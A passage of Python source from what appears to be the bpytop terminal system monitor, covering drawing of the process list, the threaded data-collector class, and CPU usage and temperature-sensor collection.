cls.start = ProcCollector.num_procs - cls.select_max + 1
else:
cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2)))
else:
new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0
if new_sel > 0 and new_sel == cls.selected:
Key.list.insert(0, "enter")
return
elif new_sel > 0 and new_sel != cls.selected:
if cls.last_selection: cls.last_selection = 0
cls.selected = new_sel
elif key == "mouse_unselect":
cls.selected = 0
if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
if old != (cls.start, cls.selected):
cls.moved = True
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True)
@classmethod
def _draw_fg(cls):
if not "proc" in cls.boxes: return
proc = ProcCollector
if proc.proc_interrupt: return
if proc.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
n: int = 0
x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2
prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int
dgx: int; dgw: int; dx: int; dw: int; dy: int
l_count: int = 0
scroll_pos: int = 0
killed: bool = True
indent: str = ""
offset: int = 0
tr_show: bool = True
usr_show: bool = True
vals: List[str]
g_color: str = ""
s_len: int = 0
if proc.search_filter: s_len = len(proc.search_filter[:10])
loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}'
end: str = ""
if proc.detailed:
dgx, dgw = x, w // 3
dw = w - dgw - 1
if dw > 120:
dw = 120
dgw = w - 121
dx = x + dgw + 2
dy = cls.y + 1
if w > 67:
arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0)
prog_len = 15
else:
arg_len = 0
prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0)
if prog_len < 15:
tr_show = False
prog_len += 5
if prog_len < 12:
usr_show = False
prog_len += 9
if CONFIG.proc_tree:
tree_len = arg_len + prog_len + 6
arg_len = 0
#* Buttons and titles only redrawn if needed
if cls.resized or cls.redraw:
s_len += len(CONFIG.proc_sorting)
if cls.resized or s_len != cls.s_len or proc.detailed:
cls.s_len = s_len
for k in ["e", "r", "c", "T", "K", "I", "enter", "left", " ", "f", "delete"]:
if k in Key.mouse: del Key.mouse[k]
if proc.detailed:
killed = proc.details.get("killed", False)
main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg
hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg
title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg
if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented:
cls.current_y = cls.y + 8
cls.current_h = cls.height - 8
for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}'
out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}'
f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}')
for i in range(7):
out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}'
out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}'
f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if cls.selected == 0:
Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)]
if cls.selected == 0 and not killed:
Key.mouse["T"] = [[dx+2 + i, dy-1] for i in range(9)]
out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}T{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if dw > 28:
if cls.selected == 0 and not killed and not "K" in Key.mouse: Key.mouse["K"] = [[dx + 13 + i, dy-1] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}K{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if dw > 39:
if cls.selected == 0 and not killed and not "I" in Key.mouse: Key.mouse["I"] = [[dx + 19 + i, dy-1] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}I{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if Graphs.detailed_cpu is NotImplemented or cls.resized:
Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu)
Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem)
cls.select_max = cls.height - 11
y = cls.y + 9
h = cls.height - 10
else:
if cls.current_y != cls.y or cls.resized:
cls.current_y = cls.y
cls.current_h = cls.height
y, h = cls.y + 1, cls.height - 2
out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}')
cls.select_max = cls.height - 3
sort_pos = x + w - len(CONFIG.proc_sorting) - 7
if not "left" in Key.mouse:
Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)]
Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' +
("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") +
f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} '
f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 29 + s_len:
if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}'
f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 37 + s_len:
if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)]
out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}'
f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 47 + s_len:
if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)]
out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}'
f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+6 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))]
if proc.search_filter:
if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+12 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)]
elif "delete" in Key.mouse:
del Key.mouse["delete"]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("F" if cls.filtering and proc.case_sensitive else "f")}{THEME.title}' +
("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') +
f'{THEME.proc_box(Symbol.title_right)}')
main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg
hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg
title = THEME.inactive_fg if cls.selected == 0 else THEME.title
out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}'
f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}'
f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}')
if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)]
if w - len(loc_string) > 34:
if not "T" in Key.mouse: Key.mouse["T"] = [[x + 22 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}T{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 40:
if not "K" in Key.mouse: Key.mouse["K"] = [[x + 33 + i, y+h] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}K{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 51:
if not "I" in Key.mouse: Key.mouse["I"] = [[x + 39 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}I{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if CONFIG.proc_tree and w - len(loc_string) > 65:
if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
#* Process list column labels
selected: str = CONFIG.proc_sorting
label: str
if selected == "memory": selected = "mem"
if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr"
if CONFIG.proc_tree:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected in ["pid", "program", "arguments"]: selected = "tree"
else:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") +
((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected == "program" and prog_len <= 8: selected = "prg"
selected = selected.split(" ")[0].capitalize()
if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB")
label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}')
out_misc += label
Draw.buffer("proc_misc", out_misc, only_save=True)
#* Detailed box draw
if proc.detailed:
if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b
elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = f'{THEME.inactive_fg}'
else: stat_color = ""
expand = proc.expand
iw = (dw - 3) // (4 + expand)
iw2 = iw - 1
out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}'
f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}')
for i, l in enumerate(["C", "P", "U"]):
out += f'{Mv.to(dy+2+i, dgx)}{l}'
for i, l in enumerate(["C", "M", "D"]):
out += f'{Mv.to(dy+4+i, dx+1)}{l}'
out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' +
(f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") +
(f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") +
(f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") +
(f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' +
(f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") +
(f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") +
(f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") +
(f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}'
f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} '
f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}')
cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5)
for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))):
out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}'
if i == 2: break
#* Checking for selection out of bounds
if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1
elif cls.start > proc.num_procs: cls.start = proc.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
#* Start iteration over all processes and info
cy = 1
for n, (pid, items) in enumerate(proc.processes.items(), start=1):
if n < cls.start: continue
l_count += 1
if l_count == cls.selected:
is_selected = True
cls.selected_pid = pid
else: is_selected = False
indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]]
if CONFIG.proc_tree:
arg_len = 0
offset = tree_len - len(f'{indent}{pid}')
if offset < 1: offset = 0
indent = f'{indent:.{tree_len - len(str(pid))}}'
if offset - len(name) > 12:
cmd = cmd.split(" ")[0].split("/")[-1]
if not cmd.startswith(name):
offset = len(name)
arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2
cmd = f'({cmd[:(arg_len-4)]})'
else:
offset = prog_len - 1
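#* Keep a small per-process cpu graph while usage is above 1%; drop it again once it has stayed below 1% for more than 10 updates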
if cpu > 1.0 or pid in Graphs.pid_cpu:
if pid not in Graphs.pid_cpu:
Graphs.pid_cpu[pid] = Graph(5, 1, None, [0])
cls.pid_counter[pid] = 0
elif cpu < 1.0:
cls.pid_counter[pid] += 1
if cls.pid_counter[pid] > 10:
del cls.pid_counter[pid], Graphs.pid_cpu[pid]
else:
cls.pid_counter[pid] = 0
end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub
if cls.selected > cy: calc = cls.selected - cy
elif 0 < cls.selected <= cy: calc = cy - cls.selected
else: calc = cy
if CONFIG.proc_colors and not is_selected:
vals = []
for v in [int(cpu), int(mem), int(threads // 3)]:
if CONFIG.proc_gradient:
val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max
vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}']
else:
vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}']
c_color, m_color, t_color = vals
else:
c_color = m_color = t_color = Fx.b
if CONFIG.proc_gradient and not is_selected:
g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}'
if is_selected:
c_color = m_color = t_color = g_color = end = ""
out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}'
#* Creates one line for a process with all gathered information
out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' +
f'{c_color}{name:<{offset}.{offset}} {end}' +
(f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") +
(t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") +
(g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") +
m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end +
f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end +
(" " if proc.num_procs > cls.select_max else ""))
#* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates
if pid in Graphs.pid_cpu:
out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}'
if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+cy+i, x)}{" " * w}'
#* Draw scrollbar if needed
if proc.num_procs > cls.select_max:
if cls.resized:
Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)]
Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)]
scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2)))
if scroll_pos < 0 or cls.start == 1: scroll_pos = 0
elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3
out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}'
f'{Mv.to(y+1+scroll_pos, x+w-1)}█')
elif "scroll_up" in Key.mouse:
del Key.mouse["scroll_up"], Key.mouse["scroll_down"]
#* Draw current selection and number of processes
out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}'
f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
#* Clean up graphs and counters for dead processes
cls.count += 1
if cls.count == 100:
cls.count = 0
for p in list(cls.pid_counter):
if not psutil.pid_exists(p):
del cls.pid_counter[p], Graphs.pid_cpu[p]
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = cls.moved = False
class Collector:
'''Data collector master class
* .start(): Starts collector thread
* .stop(): Stops collector thread
* .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run'''
stopping: bool = False
started: bool = False
draw_now: bool = False
redraw: bool = False
only_draw: bool = False
thread: threading.Thread
collect_run = threading.Event()
collect_idle = threading.Event()
collect_idle.set()
collect_done = threading.Event()
collect_queue: List = []
collect_interrupt: bool = False
proc_interrupt: bool = False
use_draw_list: bool = False
proc_counter: int = 1
@classmethod
def start(cls):
cls.stopping = False
cls.thread = threading.Thread(target=cls._runner, args=())
cls.thread.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.thread.is_alive():
cls.stopping = True
cls.started = False
cls.collect_queue = []
cls.collect_idle.set()
cls.collect_done.set()
try:
cls.thread.join()
except:
pass
@classmethod
def _runner(cls):
		'''This is meant to run in its own thread, collecting and drawing when collect_run is set'''
draw_buffers: List[str] = []
debugged: bool = False
try:
while not cls.stopping:
if CONFIG.draw_clock and CONFIG.update_ms != 1000: Box.draw_clock()
cls.collect_run.wait(0.1)
if not cls.collect_run.is_set():
continue
draw_buffers = []
cls.collect_interrupt = False
cls.collect_run.clear()
cls.collect_idle.clear()
cls.collect_done.clear()
if DEBUG and not debugged: TimeIt.start("Collect and draw")
while cls.collect_queue:
collector = cls.collect_queue.pop()
if not cls.only_draw:
collector._collect()
collector._draw()
if cls.use_draw_list: draw_buffers.append(collector.buffer)
if cls.collect_interrupt: break
if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True
if cls.draw_now and not Menu.active and not cls.collect_interrupt:
if cls.use_draw_list: Draw.out(*draw_buffers)
else: Draw.out()
if CONFIG.draw_clock and CONFIG.update_ms == 1000: Box.draw_clock()
cls.collect_idle.set()
cls.collect_done.set()
except Exception as e:
errlog.exception(f'Data collection thread failed with exception: {e}')
cls.collect_idle.set()
cls.collect_done.set()
clean_quit(1, thread=True)
@classmethod
def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False):
'''Setup collect queue for _runner'''
cls.collect_interrupt = interrupt
cls.proc_interrupt = proc_interrupt
cls.collect_idle.wait()
cls.collect_interrupt = False
cls.proc_interrupt = False
cls.use_draw_list = False
cls.draw_now = draw_now
cls.redraw = redraw
cls.only_draw = only_draw
if collectors:
cls.collect_queue = [*collectors]
cls.use_draw_list = True
if ProcCollector in cls.collect_queue:
cls.proc_counter = 1
else:
cls.collect_queue = list(cls.__subclasses__())
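			#* With proc_update_mult > 1 the process list only refreshes every Nth cycle:
			#* ProcCollector is dropped from the queue while proc_counter > 1 and the counter wraps at the multiplier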
if CONFIG.proc_update_mult > 1:
if cls.proc_counter > 1:
cls.collect_queue.remove(ProcCollector)
if cls.proc_counter == CONFIG.proc_update_mult:
cls.proc_counter = 0
cls.proc_counter += 1
cls.collect_run.set()
class CpuCollector(Collector):
'''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps'''
cpu_usage: List[List[int]] = []
cpu_upper: List[int] = []
cpu_lower: List[int] = []
cpu_temp: List[List[int]] = []
cpu_temp_high: int = 0
cpu_temp_crit: int = 0
for _ in range(THREADS + 1):
cpu_usage.append([])
cpu_temp.append([])
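	#* Index 0 holds the total cpu history, indexes 1 to THREADS hold per thread history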
freq_error: bool = False
cpu_freq: int = 0
load_avg: List[float] = []
uptime: str = ""
buffer: str = CpuBox.buffer
sensor_method: str = ""
got_sensors: bool = False
sensor_swap: bool = False
cpu_temp_only: bool = False
@classmethod
def get_sensors(cls):
'''Check if we can get cpu temps and return method of getting temps'''
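		#* Detection order: macOS helper tools (coretemp, osx-cpu-temp), a user selected psutil sensor,
		#* any psutil sensor that looks like a cpu/package/core temp, and lastly vcgencmd on Linux (Raspberry Pi)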
cls.sensor_method = ""
if SYSTEM == "MacOS":
try:
if which("coretemp") and subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip().replace("-", "").isdigit():
cls.sensor_method = "coretemp"
elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", universal_newlines=True).rstrip().endswith("°C"):
cls.sensor_method = "osx-cpu-temp"
except: pass
elif CONFIG.cpu_sensor != "Auto" and CONFIG.cpu_sensor in CONFIG.cpu_sensors:
cls.sensor_method = "psutil"
elif hasattr(psutil, "sensors_temperatures"):
try:
temps = psutil.sensors_temperatures()
if temps:
for name, entries in temps.items():
if name.lower().startswith("cpu"):
cls.sensor_method = "psutil"
break
for entry in entries:
if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")):
cls.sensor_method = "psutil"
break
except: pass
if not cls.sensor_method and SYSTEM == "Linux":
try:
if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip().endswith("'C"):
cls.sensor_method = "vcgencmd"
except: pass
cls.got_sensors = bool(cls.sensor_method)
@classmethod
def _collect(cls):
cls.cpu_usage[0].append(round(psutil.cpu_percent(percpu=False)))
if len(cls.cpu_usage[0]) > Term.width * 4:
del cls.cpu_usage[0][0]
cpu_times_percent = psutil.cpu_times_percent()
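		#* cpu_graph_upper/lower is either "total" (reuses the aggregated percent list) or any
		#* psutil.cpu_times_percent() field, looked up dynamically with getattr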
for x in ["upper", "lower"]:
if getattr(CONFIG, "cpu_graph_" + x) == "total":
setattr(cls, "cpu_" + x, cls.cpu_usage[0])
else:
getattr(cls, "cpu_" + x).append(round(getattr(cpu_times_percent, getattr(CONFIG, "cpu_graph_" + x))))
if len(getattr(cls, "cpu_" + x)) > Term.width * 4:
del getattr(cls, "cpu_" + x)[0]
for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1):
cls.cpu_usage[n].append(round(thread))
if len(cls.cpu_usage[n]) > Term.width * 2:
del cls.cpu_usage[n][0]
try:
if hasattr(psutil.cpu_freq(), "current"):
cls.cpu_freq = round(psutil.cpu_freq().current)
except Exception as e:
if not cls.freq_error:
cls.freq_error = True
errlog.error("Exception while getting cpu frequency!")
errlog.exception(f'{e}')
cls.load_avg = [round(lavg, 2) for lavg in psutil.getloadavg()]
cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3].replace(" days,", "d").replace(" day,", "d")
if CONFIG.check_temp and cls.got_sensors:
cls._collect_temps()
@classmethod
def _collect_temps(cls):
temp: int = 1000
cores: List[int] = []
core_dict: Dict[int, int] = {}
entry_int: int = 0
cpu_type: str = ""
c_max: int = 0
s_name: str = "_-_"
s_label: str = "_-_"
if cls.sensor_method == "psutil":
try:
if CONFIG.cpu_sensor != "Auto":
s_name, s_label = CONFIG.cpu_sensor.split(":", 1)
for name, entries in psutil.sensors_temperatures().items():
for num, entry in enumerate(entries, 1):
if name == s_name and (entry.label == s_label or str(num) == s_label) and round(entry.current) > 0:
if entry.label.startswith("Package"):
cpu_type = "intel"
elif entry.label.startswith("Tdie"):
cpu_type = "ryzen"
else:
cpu_type = "other"
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
temp = round(entry.current)
elif entry.label.startswith(("Package", "Tdie")) and cpu_type in ["", "other"] and s_name == "_-_" and hasattr(entry, "current") and round(entry.current) > 0:
if not cls.cpu_temp_high or cls.sensor_swap or cpu_type == "other":
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
cpu_type = "intel" if entry.label.startswith("Package") else "ryzen"
temp = round(entry.current)
elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current") and round(entry.current) > 0:
if entry.label.startswith(("Core", "Tccd")):
entry_int = int(entry.label.replace("Core", "").replace("Tccd", ""))
if entry_int in core_dict and cpu_type != "ryzen":
if c_max == 0:
c_max = max(core_dict) + 1
if c_max < THREADS // 2 and (entry_int + c_max) not in core_dict:
core_dict[(entry_int + c_max)] = round(entry.current)
continue
elif entry_int in core_dict:
continue
core_dict[entry_int] = round(entry.current)
continue
elif cpu_type in ["intel", "ryzen"]:
continue
if not cpu_type:
cpu_type = "other"
if not cls.cpu_temp_high or cls.sensor_swap:
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
